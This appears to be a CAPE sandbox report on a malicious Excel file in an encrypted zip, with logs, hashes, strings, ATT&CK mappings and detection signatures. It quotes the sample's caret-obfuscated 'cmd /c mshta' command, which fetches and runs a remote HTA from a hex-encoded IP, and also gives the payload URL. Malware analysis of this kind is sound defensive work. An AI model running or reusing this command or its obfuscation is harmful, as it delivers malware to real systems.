2025-12-08 08:35:21,550 [root] DEBUG: 5720: DLL loaded at 0x74D40000: C:\Windows\system32\uxtheme (0x7f000 bytes).
2025-12-08 08:35:21,550 [root] DEBUG: 6460: DLL loaded at 0x75540000: C:\Windows\System32\bcryptPrimitives (0x62000 bytes).
2025-12-08 08:35:21,550 [root] DEBUG: 6460: DLL loaded at 0x6BA40000: C:\Windows\System32\srvcli (0x1d000 bytes).
2025-12-08 08:35:21,550 [root] DEBUG: 5720: DLL loaded at 0x76130000: C:\Windows\System32\clbcatq (0x82000 bytes).
2025-12-08 08:35:21,565 [root] DEBUG: 6460: DLL loaded at 0x6BA60000: C:\Windows\System32\urlmon (0x1a2000 bytes).
2025-12-08 08:35:21,565 [root] DEBUG: 6460: set_hooks_by_export_directory: Hooked 0 out of 613 functions
2025-12-08 08:35:21,565 [root] DEBUG: 6460: DLL loaded at 0x74F30000: C:\Windows\SYSTEM32\kernel.appcore (0x13000 bytes).
2025-12-08 08:35:21,580 [root] DEBUG: 6460: DLL loaded at 0x65900000: C:\Windows\System32\msIso (0x38000 bytes).
2025-12-08 08:35:21,596 [root] DEBUG: 6460: DLL loaded at 0x74D40000: C:\Windows\system32\uxtheme (0x7f000 bytes).
2025-12-08 08:35:21,596 [root] DEBUG: 5720: DLL loaded at 0x658D0000: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\FileCoAuthLib (0x2b000 bytes).
2025-12-08 08:35:21,596 [root] DEBUG: 6460: DLL loaded at 0x76D20000: C:\Windows\System32\MSCTF (0xfc000 bytes).
2025-12-08 08:35:21,596 [root] DEBUG: 6768: DLL loaded at 0x658D0000: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\FileCoAuthLib (0x2b000 bytes).
2025-12-08 08:35:21,612 [root] DEBUG: 6460: DLL loaded at 0x76130000: C:\Windows\System32\clbcatq (0x82000 bytes).
2025-12-08 08:35:21,612 [root] DEBUG: 5720: caller_dispatch: Added region at 0x680D0000 to tracked regions list (version::GetFileVersionInfoSizeW returns to 0x680EE94A, thread 5888).
2025-12-08 08:35:21,612 [root] DEBUG: 5720: ProcessTrackedRegion: Region at 0x680D0000 mapped as \Device\HarddiskVolume2\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\UpdateRingSettings.dll, skipping
2025-12-08 08:35:21,612 [root] DEBUG: 6460: InstrumentationCallback: Added region at 0x761F0000 to tracked regions list (thread 2652).
2025-12-08 08:35:21,628 [root] DEBUG: 6460: DLL loaded at 0x72DB0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.2506_none_6eb991c088050a06\comctl32 (0x228000 bytes).
2025-12-08 08:35:21,628 [root] DEBUG: 6460: DLL loaded at 0x658A0000: C:\Windows\System32\srpapi (0x29000 bytes).
2025-12-08 08:35:21,628 [root] DEBUG: 6460: DLL loaded at 0x758D0000: C:\Windows\System32\OLEAUT32 (0x9c000 bytes).
2025-12-08 08:35:21,643 [root] DEBUG: 6460: DLL loaded at 0x76330000: C:\Windows\System32\shell32 (0x697000 bytes).
2025-12-08 08:35:21,643 [root] DEBUG: 6460: DLL loaded at 0x6B590000: C:\Windows\System32\WININET (0x488000 bytes).
2025-12-08 08:35:21,643 [root] DEBUG: 6460: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 08:35:21,643 [root] DEBUG: 6460: DLL loaded at 0x74C50000: C:\Windows\SYSTEM32\wintypes (0xc7000 bytes).
2025-12-08 08:35:21,659 [root] DEBUG: 6460: DLL loaded at 0x74020000: C:\Windows\SYSTEM32\windows.storage (0x6ec000 bytes).
2025-12-08 08:35:21,659 [root] DEBUG: 6460: DLL loaded at 0x73A00000: C:\Windows\System32\profapi (0x1d000 bytes).
2025-12-08 08:35:21,675 [root] DEBUG: 6460: DLL loaded at 0x6A720000: C:\Windows\SYSTEM32\ondemandconnroutehelper (0x14000 bytes).
2025-12-08 08:35:21,675 [root] DEBUG: 6460: DLL loaded at 0x74F50000: C:\Windows\system32\mswsock (0x51000 bytes).
2025-12-08 08:35:21,675 [root] DEBUG: 6460: DLL loaded at 0x750C0000: C:\Windows\SYSTEM32\IPHLPAPI (0x24000 bytes).
2025-12-08 08:35:21,690 [root] DEBUG: 6460: DLL loaded at 0x75330000: C:\Windows\System32\NSI (0x7000 bytes).
2025-12-08 08:35:21,690 [root] DEBUG: 6460: DLL loaded at 0x72D40000: C:\Windows\SYSTEM32\WINNSI (0xa000 bytes).
2025-12-08 08:35:21,690 [root] DEBUG: 6460: DLL loaded at 0x750A0000: C:\Windows\SYSTEM32\dhcpcsvc6 (0x16000 bytes).
2025-12-08 08:35:21,690 [root] DEBUG: 6460: DLL loaded at 0x75080000: C:\Windows\SYSTEM32\dhcpcsvc (0x17000 bytes).
2025-12-08 08:35:21,737 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:21,940 [root] DEBUG: 6768: DLL loaded at 0x65840000: C:\Windows\System32\oleacc (0x54000 bytes).
2025-12-08 08:35:22,831 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:23,877 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:24,893 [root] DEBUG: 6460: DLL loaded at 0x657F0000: C:\Windows\SYSTEM32\WLDP (0x44000 bytes).
2025-12-08 08:35:24,909 [root] DEBUG: 6460: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 08:35:24,940 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:25,972 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:26,036 [root] DEBUG: 6768: DLL loaded at 0x65720000: C:\Windows\SYSTEM32\CoreMessaging (0xcd000 bytes).
2025-12-08 08:35:26,051 [root] DEBUG: 6768: DLL loaded at 0x65480000: C:\Windows\SYSTEM32\CoreUIComponents (0x291000 bytes).
2025-12-08 08:35:27,006 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:27,632 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2025-12-08.2235.5720.1.aodl
2025-12-08 08:35:27,632 [root] DEBUG: 5720: NtTerminateProcess hook: Attempting to dump process 5720
2025-12-08 08:35:27,632 [root] DEBUG: 5720: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:35:27,647 [root] INFO: Process with pid 5720 has terminated
2025-12-08 08:35:28,038 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:29,103 [root] DEBUG: 6460: DLL loaded at 0x74FB0000: C:\Windows\System32\VERSION (0x8000 bytes).
2025-12-08 08:35:29,103 [root] DEBUG: 6460: DLL loaded at 0x73E20000: C:\Windows\System32\USERENV (0x24000 bytes).
2025-12-08 08:35:29,103 [root] DEBUG: 6460: DLL loaded at 0x679B0000: C:\Windows\System32\ieframe (0x660000 bytes).
2025-12-08 08:35:29,119 [root] DEBUG: 6460: DLL loaded at 0x681E0000: C:\Windows\system32\msimtf (0xe000 bytes).
2025-12-08 08:35:29,134 [root] DEBUG: 6460: DLL loaded at 0x6A1E0000: C:\Windows\SYSTEM32\textinputframework (0xf9000 bytes).
2025-12-08 08:35:29,150 [root] DEBUG: 6460: DLL loaded at 0x68190000: C:\Windows\system32\dataexchange (0x4c000 bytes).
2025-12-08 08:35:29,165 [root] DEBUG: 6460: DLL loaded at 0x6BC10000: C:\Windows\system32\twinapi.appcore (0x1eb000 bytes).
2025-12-08 08:35:29,165 [root] DEBUG: 6460: DLL loaded at 0x73120000: C:\Windows\System32\dxgi (0xca000 bytes).
2025-12-08 08:35:29,181 [root] DEBUG: 6460: DLL loaded at 0x73980000: C:\Windows\SYSTEM32\dxcore (0x2d000 bytes).
2025-12-08 08:35:29,181 [root] DEBUG: 6460: DLL loaded at 0x68180000: C:\Windows\SYSTEM32\resourcepolicyclient (0x10000 bytes).
2025-12-08 08:35:29,181 [root] DEBUG: 6460: DLL loaded at 0x73940000: C:\Windows\SYSTEM32\directxdatabasehelper (0x3c000 bytes).
2025-12-08 08:35:29,181 [root] DEBUG: 6460: OpenProcessHandler: Image base for process 6760 (handle 0x668): 0x00990000.
2025-12-08 08:35:29,181 [root] DEBUG: 6460: OpenProcessHandler: Injection info created for process 6760, handle 0x668: C:\Windows\SysWOW64\cmd.exe
2025-12-08 08:35:29,197 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:30,228 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:31,275 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:31,900 [root] DEBUG: 6768: DLL loaded at 0x68110000: C:\Windows\System32\appresolver (0x80000 bytes).
2025-12-08 08:35:32,322 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:33,353 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:34,307 [root] DEBUG: 6768: DLL loaded at 0x68190000: C:\Windows\system32\dataexchange (0x4c000 bytes).
2025-12-08 08:35:34,323 [root] DEBUG: 6768: DLL loaded at 0x68080000: C:\Windows\SYSTEM32\sxs (0x85000 bytes).
2025-12-08 08:35:34,401 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:35,448 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:36,483 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:37,532 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:38,578 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:39,611 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:40,643 [root] DEBUG: 6460: DLL loaded at 0x68050000: C:\Windows\System32\msls31 (0x2c000 bytes).
2025-12-08 08:35:40,643 [root] DEBUG: 6460: DLL loaded at 0x71320000: C:\Windows\System32\d2d1 (0x51b000 bytes).
2025-12-08 08:35:40,659 [root] DEBUG: 6460: DLL loaded at 0x70EB0000: C:\Windows\System32\DWrite (0x224000 bytes).
2025-12-08 08:35:40,659 [root] DEBUG: 6460: DLL loaded at 0x710E0000: C:\Windows\System32\d3d11 (0x238000 bytes).
2025-12-08 08:35:40,659 [root] DEBUG: 6460: DLL loaded at 0x6C910000: C:\Windows\System32\d3d10warp (0x5f1000 bytes).
2025-12-08 08:35:40,721 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:41,753 [root] INFO: Announced starting service "b'WinHttpAutoProxySvc'"
2025-12-08 08:35:42,771 [root] DEBUG: 6460: AllocationHandler: Adding allocation to tracked region list: 0x7FCD0000, size: 0x1000.
2025-12-08 08:35:42,787 [root] DEBUG: 6460: AllocationHandler: Adding allocation to tracked region list: 0x7FCC1000, size: 0x1000.
2025-12-08 08:35:50,328 [root] DEBUG: 6768: api-cap: GetAsyncKeyState hook disabled due to count: 5000

Machine

Name	Label	Manager	Started On	Shutdown On	Route
win11-64bit-tiny-3	win11-64bit-tiny-3	KVM	2025-12-08 16:39:02	2025-12-08 16:43:09	inetsim

File Details

File Name	32e843c35f0b39a4ff9d.zip
File Type	Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
File Size	100322 bytes
MD5	11ec5967b7b8746b7ff42e8057b77c0c
SHA1	b5b09e801f42dbd96096dfdd410fde2a70be5ba2
SHA256	37c72f104a2bbabd8326f738732a9f05934d39b415cb0870b125395ffe0f42f8 [VT] [MWDB] [Bazaar]
SHA3-384	e55c13dd0a97877d9f7eb17d9663d970cd831c9c02a1a5e34c5b02f02436c7d96c7344103d7f6e4f80870965c49ed898
CRC32	4A80A8D2
TLSH	T182A3126C67E037EAEAE97A4633CFD3830B56C216464BE096243564C5784287F4EB4F29
Ssdeep	3072:TznDMt6NzqMP5Nv5SsXIo2fvrotxv8da3ZC29aGHybqsbt:TnMteFxNxSMIPSv8oXcGSbqMt
	File Strings BinGraph Vba2Graph

+C2yw

U*Q[aCq

YCD:6

4fmGi

Z7Ih)

QySow

Tfx8p/

*;=V/

J`j7U

}K}`K

=]kqPK

uN<x)

!%jVN

qPG|PH

+|{2r

zy8M6

0_}~?2TL

1\#`AN

4zBi@b

1RIRm

/#u(R

N(BkI

p3M\>

1tv@N

#zt7/

:")w<!

W0m77

[gjn#

t.p3<

IcsV&

$ZE[d

&V3.W:^

YE;^2

zc.pJOr9

Ug<v<

l/&#d

@<aZ]

c[k'!

KiL\&

;>1L&'

Iw[p')

Gy(-OV

(g9l\

A"9R"n=

C4)<=7

1g{JK

_uchd

(KP5O);

byBw!

3:4p3

mYr,IY#;!kj

%H(Vy

9)[|Skx

V |Zd

au\Y.LD

`iOw5

,;-iMK

rTQX-

P5EE\

<P'T"

A9F1}d

<o&wz

yFj;`

R8*@{

k[E1*&{

ct.?_

V&BQHB%K

>"ed4`

.q2{{$+

'Z3I\

vjb;J

rChl"

$Z'%

9+yS*,

4P6guQ

2o5c

f]&[N

Nh-ST

.nv'"

$12|n2

K@0tL1Ex

B(_ZDm

jHz0z

:IstL

w|}H@

gKJi%

OMU2?

!wEwJ6

@(mcz

vMFNx8V

HNE0}ev

dYwl0*

aJ]u@

~K#V8

L/q(T

",Z@l

0Vy-<

+\iAm]^

/# *^@R

bXkam

M.a5#

L5(8_t

y6e|r

W)"L"-w

HwtWPJ

eE<-z

Px&NP@

hJz1qk2Y

h:g,(

]8?y#t

<Osar

j};Hf4

j5?#a

f%-"AF

9mL"N

$#73m

pk>@ ;a0

XfhY+

^/#!u

s}HeO4

^,LJV

Sl`\W%Le

Bqc-4

iLdxM(

nrkF,

4P:Cm

pxjtcb

aj$$h

7z+;J.:

LgRwf

`'M@U

0h20y

8,H?=

s[U!|

&=*:>

7_Xfv6

a2w@8

?SZ>P}7

E"49)

+"[iy5

}\zt[u

g!m,J

CN65m

g.llED

i3nIm

+)2Ay

yHS B

;+JH;

.@2="

t2]^8;]

6Vslc

v3ocG

4gRuJ

kTmp(%

{W];$

uuez9A

m$ Z}

_|%Wk

gAc>I

I9|F}7

[7+jOc

YwH@X-o

w&L28

`{O$*

ufaO5'\

p+YFN~R

S@i@&

og*B7-dw

l\=DS

rMzqU

i5[E,

oV(#d

"w\1tM

<9{5D

jHM9L

ZNA8;

y9LK*Q

8ozwl

g/TG_

WZw>Cd

z\\r:}

'R?bUI

D0vrs

{a+cA

|!n0_

Zom.#

%Y%`W

vFubX

gYE _

&?@FZU

R#P"]

s)uT;

CVHs`

=8)"6

;:GC`

^2\IO

Okv:m

&D!t"

<9qli(

LJ;0E

02X |=

-<2g=

=EJ|7

:w1f*

t}AxP

{jGHo

|=[&

9Iq%h}

g<R)}pQ

n?u)&c

7]b;Oy

Rd4UM|

3mxMN

-OZUZ

FdrF-

Q0=yTA_

I]bU3

D8OR+-M

4moRl

.5R.#g)

Wxf%[8

[#-d{R`

S 3DU

Pa]O,$

Ib^-L

4398'$}

\KuWv

^rbX}Bi

,{ud

F>>}a

-gFQs

M)q'g

^-~o#

ANLJ4L@SzOx>

9A_q\

_W&lQg

0Z6Il

2s0.S=wc

1J8_@f%i

W>9BV

\#u-

l)<#p

(#b7r7}

-0 [_

VW_}d

m_NRt

\SFm{#

9A>~z

0E:ybc

hbtv{0

tg:}Qi

u{',l

,LCBMr1nQ

i[R"8

JWT=dYj

Wc84j

[&UBZT

`wENb

Xx{]S

LK21b

ek+|g

=,&$LO

C]v6k

n<jgD

{,RPU

4XV{uj

,a!S!

'EuT#

.`*ea#

wS>^!

ni~ZTB

B&Dm"

`"uyxy

N#a}M

c{1tWx

N0x}|

45g Kvn

36s1,

rBiY%

Gg9tpD

<jU+,8_

2zH"j

Mvn=*

/VDfuA

XNI<N

\5CXu

u|H2#

X<K:]&V

C"<el

ync]Ep

fDB.n+

?]hwl

7H)YT

4{k-c

KvjSAA^

oKDztfD

!gR`:

K`*i+ju&

32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls

oUE?q

M{tgqf

Xf /\$

gBdGY

j1$NV)

$P~IL

9F?*E

;oX<e

_F{D_

yiv"-

P9CoC|=[

wMD"7

[U48P

PpMqXY

4KGi|

^/IJD

BatsGv\d

Qm/MC

=F/ywl/n

tpkGn|\

*Ax&!

t$Wg%

(2$@;

/T%,n<?,

nw*;EsI

[&_xs

<*x,#@

5=#9E

%]D@A

6(%*r

:pZ%p

9V|Uu

-|7Ih2H6F(

M.klh9

b-nD6}

qz~1R%N

=VVcq

(ey')

\v'5@2`a'

>B2d%NB

"(S}>

trb{d

rkDkuj$eT@

w1{Gp

rj&1'=

+gX}H

P.,+A

dAw^z

OQ:r"$=E

(H~6-

?U:@.

l:~ T

AvXx<$

_-WAn

X8^cA

x8d .

i%z)f2CdT&

#1+0%

]575d

=Xl5R

aJkCk

J/t>EG

$I){E$

!h/[j

9+5f7

2/TfK

%#Z|C

d|.5z

I<\04^

$JVZdA

ur_GQ

>g]QeL}>

H}?`;

hAd63

+ ip|>\

&&;+Eo

/c!q!

?V(q)]

a$M;:

XM*Lw

Wpay3Y

/x]*Gh

s'1@P

C!~d_

k6)aI

$+{2"%B

.)0A?e

Yk=rl

8rhU3V

NF]Pb

5qd#n

:R=k6

GtdT:

m[={I

HP`G7

kbQ-JX

PhwCz

0ZJJw

1-9/g

BFl,T{

%w |4

r~pbw

u$,j|0F

UpHd%

D_+2I_

@ASO#

)EhTT

[X #%

&v<sA

~>, v

c<m'j

T?(RqKt

|P`~z

4kI(wF

=ZIj*x

gw7r$t

h(eJpW"

4vy|au

R?!;N

?[~MMo2[

>e!zj

Q762z

gZwH$-~

fqoq@

Y_s["

64KjD

ohq$*

R5 C2

-NxK]

!yzlq

J)4,-

l \AS

r};[Y

UlV(5\]

rR9D!{

kuV9U'

e{96r?

7a%tP

+Md&Dk

gD.*r

=s-vy0

p*7${

Reports: JSON HTML Lite

Mitre ATT&CK

Defense Evasion	Discovery	Command and Control	Privilege Escalation	Execution	Impact
T1564 - Hide Artifacts stealth_file T1202 - Indirect Command Execution uses_windows_utilities T1562 - Impair Defenses antisandbox_unhook office_security T1036 - Masquerading accesses_public_folder T1055 - Process Injection resumethread_remote_process T1112 - Modify Registry office_security T1548 - Abuse Elevation Control Mechanism accesses_public_folder T1070 - Indicator Removal deletes_files T1064 - Scripting script_network_activity T1562.001 - Disable or Modify Tools antisandbox_unhook office_security T1027 - Obfuscated Files or Information cmdline_obfuscation T1070.004 - File Deletion deletes_files T1564.001 - Hidden Files and Directories stealth_file	T1082 - System Information Discovery antivm_checks_available_memory T1057 - Process Discovery createtoolhelp32snapshot_module_enumeration	T1071 - Application Layer Protocol terminates_remote_process script_network_activity command_line_url_extracted http_request cmdline_http_link dead_connect multiple_useragents	T1055 - Process Injection resumethread_remote_process T1548 - Abuse Elevation Control Mechanism accesses_public_folder	T1059 - Command and Scripting Interpreter command_line_url_extracted cmdline_http_link script_network_activity cmdline_obfuscation T1064 - Scripting script_network_activity	T1486 - Data Encrypted for Impact ransomware_like_modify_files

Statistics (2.08)

Usage

Processing ( 1.66 seconds )

0.958 BehaviorAnalysis
0.689 CAPE
0.007 Heatmap
0.003 AnalysisInfo
0.001 Debug

Signatures ( 0.26 seconds )

0.063 antiav_detectreg
0.026 territorial_disputes_sigs
0.023 infostealer_ftp
0.014 antianalysis_detectreg
0.013 infostealer_im
0.012 masquerade_process_name
0.01 antiav_detectfile
0.01 infostealer_mail
0.006 antivm_vbox_keys
0.006 infostealer_bitcoin
0.005 antianalysis_detectfile
0.005 antidebug_devices
0.005 antivm_vmware_keys
0.004 antivm_vbox_files
0.004 ketrican_regkeys
0.004 ransomware_files
0.003 antivm_generic_diskreg
0.003 antivm_parallels_keys
0.003 antivm_xen_keys
0.003 geodo_banking_trojan
0.003 darkcomet_regkeys
0.003 poullight_files
0.003 recon_fingerprint
0.002 antivm_vpc_keys
0.002 ransomware_extensions
0.002 limerat_regkeys
0.002 remcos_regkeys
0.001 accesses_netlogon_regkey
0.001 antivm_bochs_keys
0.001 antivm_generic_bios
0.001 antivm_hyperv_keys
0.001 antivm_vbox_devices
0.001 antivm_vmware_files
0.001 banker_cridex
0.001 browser_security
0.001 bypass_firewall
0.001 file_credential_store_access
0.001 registry_credential_store_access
0.001 driver_filtermanager
0.001 qulab_files
0.001 packer_armadillo_regkey
0.001 medusalocker_regkeys
0.001 revil_mutexes
0.001 obliquerat_files
0.001 rat_pcclient
0.001 warzonerat_regkeys
0.001 sniffer_winpcap
0.001 ursnif_behavior

Reporting ( 0.16 seconds )

0.058 LiteReport
0.053 JsonDump
0.047 ReportHTML
0.006 MITRE_TTPS

Signatures

Checks available memory

Attempts to connect to a dead IP:Port (1 unique times)

IP: 185.7.214.7:80

Queries the keyboard layout

A file was accessed within the Public folder.

file: C:\Users\Public\Documents\desktop.ini

SetUnhandledExceptionFilter detected (possible anti-debug)

Uses Windows APIs to generate a cryptographic key

Office loads COM DLLs, indicative of Office Macros spawning CMD process for execution

Possible date expiration check, exits too soon after checking local time

process: FileCoAuth.exe, PID 5720

Deletes files from disk

DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\1380790193167760279.C4

DeletedFile: C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Word\1380790193167760279.C4

DeletedFile: C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml

Performs HTTP requests potentially not found in PCAP.

url: 185.7.214.7:80//fer/fer.html

Resumed a thread in another process

thread_resumed: Process excel.exe with process ID 6768 resumed a thread in another process with the process ID 6768

thread_resumed: Process svchost.exe with process ID 844 resumed a thread in another process with the process ID 7032

Enumerates the modules from a process (may be used to locate base addresses in process injection)

module: pid 6768 module ntdll.dll

module: pid 6768 module KERNEL32.DLL

module: pid 6768 module KERNELBASE.dll

module: pid 6768 module apphelp.dll

module: pid 6768 module CRYPT32.dll

module: pid 6768 module ucrtbase.dll

module: pid 6768 module WS2_32.dll

module: pid 6768 module RPCRT4.dll

module: pid 6768 module USER32.dll

module: pid 6768 module win32u.dll

module: pid 6768 module GDI32.dll

module: pid 6768 module gdi32full.dll

module: pid 6768 module msvcp_win.dll

module: pid 6768 module ADVAPI32.dll

module: pid 6768 module msvcrt.dll

module: pid 6768 module sechost.dll

module: pid 6768 module ole32.dll

module: pid 6768 module combase.dll

module: pid 6768 module SHLWAPI.dll

module: pid 6768 module bcrypt.dll

module: pid 6768 module AppVIsvSubsystems32.dll

module: pid 6768 module VCRUNTIME140.dll

module: pid 6768 module MSVCP140.dll

module: pid 6768 module c2r32.dll

module: pid 6768 module SHELL32.dll

module: pid 6768 module USERENV.dll

module: pid 6768 module IMM32.DLL

module: pid 6768 module CRYPTBASE.DLL

module: pid 6768 module SspiCli.dll

module: pid 6768 module oleaut32.dll

module: pid 6768 module mso20win32client.dll

module: pid 6768 module CRYPTUI.dll

module: pid 6768 module IPHLPAPI.DLL

module: pid 6768 module mso30win32client.dll

module: pid 6768 module wevtapi.dll

module: pid 6768 module mso40uiwin32client.dll

module: pid 6768 module gdiplus.dll

module: pid 6768 module mso50win32client.dll

module: pid 6768 module mso98win32client.dll

module: pid 6768 module HTTPAPI.dll

module: pid 6768 module PROPSYS.dll

module: pid 6768 module WTSAPI32.dll

module: pid 6768 module mso.dll

module: pid 6768 module bcryptPrimitives.dll

module: pid 6768 module msi.dll

module: pid 6768 module Comctl32.dll

module: pid 6768 module d2d1.dll

module: pid 6768 module windows.storage.dll

module: pid 6768 module wintypes.dll

module: pid 6768 module SHCORE.dll

module: pid 6768 module profapi.dll

module: pid 6768 module uxtheme.dll

module: pid 6768 module MSCTF.dll

module: pid 6768 module WINSTA.dll

module: pid 6768 module dxgi.dll

module: pid 6768 module dxcore.dll

module: pid 6768 module directxdatabasehelper.dll

module: pid 6768 module kernel.appcore.dll

module: pid 6768 module VERSION.dll

module: pid 6768 module POWRPROF.dll

module: pid 6768 module UMPDC.dll

module: pid 6768 module d3d11.dll

module: pid 6768 module d3d10warp.dll

module: pid 6768 module Secur32.dll

module: pid 6768 module clbcatq.dll

module: pid 6768 module Normaliz.dll

module: pid 6768 module DWrite.dll

module: pid 6768 module netprofm.dll

module: pid 6768 module mscoree.dll

module: pid 6768 module Windows.Security.Authentication.Web.Core.dll

module: pid 6768 module mscoreei.dll

module: pid 6768 module npmproxy.dll

module: pid 6768 module iertutil.dll

module: pid 6768 module WINHTTP.dll

module: pid 6768 module MsoAria.dll

module: pid 6768 module OneCoreCommonProxyStub.dll

module: pid 6768 module mswsock.dll

module: pid 6768 module RICHED20.DLL

module: pid 6768 module vaultcli.dll

module: pid 6768 module WINNSI.DLL

module: pid 6768 module NSI.dll

module: pid 6768 module Windows.Web.dll

module: pid 6768 module MicrosoftAccountWAMExtension.dll

module: pid 6768 module XmlLite.dll

module: pid 6768 module Windows.UI.dll

module: pid 6768 module aadWamExtension.dll

module: pid 6768 module dhcpcsvc6.DLL

module: pid 6768 module Windows.UI.Immersive.dll

module: pid 6768 module twinapi.appcore.dll

module: pid 6768 module dhcpcsvc.DLL

module: pid 6768 module DPAPI.dll

module: pid 6768 module urlmon.dll

module: pid 6768 module srvcli.dll

module: pid 6768 module netutils.dll

module: pid 6768 module sppc.dll

module: pid 6768 module sppcs.dll

module: pid 6768 module WININET.dll

module: pid 6768 module wbemprox.dll

module: pid 6768 module wbemcomn.dll

module: pid 6768 module oart.dll

module: pid 6768 module wbemsvc.dll

module: pid 6768 module HvsiManagementApi.dll

module: pid 6768 module WindowsDefenderApplicationGuardCSP.dll

module: pid 6768 module policymanager.dll

module: pid 6768 module msvcp110_win.dll

module: pid 6768 module ondemandconnroutehelper.dll

module: pid 6768 module fastprox.dll

module: pid 6768 module Cabinet.dll

module: pid 6768 module d3d10_1.dll

module: pid 6768 module d3d10_1core.dll

module: pid 6768 module webio.dll

module: pid 6768 module amsi.dll

module: pid 6768 module dwmapi.dll

module: pid 6768 module DNSAPI.dll

module: pid 6768 module MpOav.dll

module: pid 6768 module rasadhlp.dll

module: pid 6768 module TextShaping.dll

module: pid 6768 module webservices.dll

module: pid 6768 module textinputframework.dll

module: pid 6768 module twinapi.dll

Terminates another process

process: svchost.exe

A HTTP/S link was seen in a script or command line

command: mshta http://0xb907d607/fer/fer.html

Checks for presence of debugger via IsDebuggerPresent

A url link was seen in a script or command line and extracted

url: http://0xb907d607/fer/fer.html

Uses Windows utilities for basic functionality

command: cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html

Tries to unhook or modify Windows functions monitored by CAPE

unhook: function_name: URLDownloadToFileW, type: removal

unhook: function_name: IsValidURL, type: removal

unhook: function_name: ObtainUserAgentString, type: removal

unhook: function_name: CoInternetSetFeatureEnabled, type: removal

unhook: function_name: URLDownloadToCacheFileW, type: removal

Network activity contains more than one unique useragent.

process: EXCEL.EXE

user-agent:

process: mshta.exe

user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)

A script process initiated network activity

request: /fer/fer.html

Creates a hidden or system file

file: C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

Appears to use command line obfuscation

command: cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html

Attempts to modify Microsoft Office security settings

Multiple files with the same extensions were modified, indicating ransomware behaviour

File Extension: C4: 5

Screenshots

No screenshots available.

Session Playback

No playback available.

Hosts

No hosts contacted.

DNS

No domains contacted.

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\System32\tzres.dll
C:\Windows\System32\en-US\tzres.dll.mui
C:\Windows\sysnative\en-US\tzres.dll.mui
C:\ProgramData\Microsoft\Office\ClickToRunPackageLocker
\Device\CNG
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\msowercrash.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\Cultures\OFFICE.ODF
C:\Users\user\AppData\Local\Temp\{190C62E0-8338-4298-B5AA-DA9CDB831115} - OProcSessId.dat
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\windows.storage.dll
C:\Windows\SysWOW64\windows.storage.dll
\Device\SrpDevice
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\WinTypes.dll
C:\Windows\SysWOW64\WinTypes.dll
C:\Users\user\AppData\Local\Microsoft\Office\Features\1-3FeatureCache.txt
C:\Program Files (x86)\Microsoft Office\root\Office16\WINSTA.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\winsta.dll
C:\Windows\SysWOW64\winsta.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\resourcepolicyclient.dll
C:\Windows\SysWOW64\resourcepolicyclient.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\directxdatabasehelper.dll
C:\Windows\SysWOW64\directxdatabasehelper.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\kernel.appcore.dll
C:\Windows\SysWOW64\kernel.appcore.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\apppatch\DirectXApps.sdb
C:\Windows\apppatch\DirectXApps.sdb
C:\Program Files (x86)\Microsoft Office\root\Office16\d3d10warp.dll
